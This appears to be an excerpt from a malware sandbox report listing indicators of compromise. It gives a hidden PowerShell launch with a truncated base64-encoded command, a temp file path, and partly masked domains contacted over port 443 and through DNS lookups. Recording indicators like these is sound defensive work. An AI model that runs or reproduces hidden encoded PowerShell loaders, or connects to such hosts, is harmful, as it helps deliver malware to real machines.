Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAGQAdAB5AGMAcQBjAHkAPQAnAEEAegBrAGQAdQBtAGoAcwBpAGEAYwAnADsAJABaAGcAdwBiAG8AYgB2AGkAbwAgAD0AIAAnADYANgAnADsAJABJAGgAdABiAGwAcgBxAHgAcwBwAD0AJwBQAGwAcQBjAHI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\833747.cvr
- 'ic#####cketainment.com':443
- 'da#####onsultancy.com':443
- 'da#####onsultancy.com':443
- DNS ASK ho###dream.net
- DNS ASK ra####hanrajput.com
- DNS ASK ic#####cketainment.com
- DNS ASK da#####onsultancy.com
- DNS ASK da###rbd.com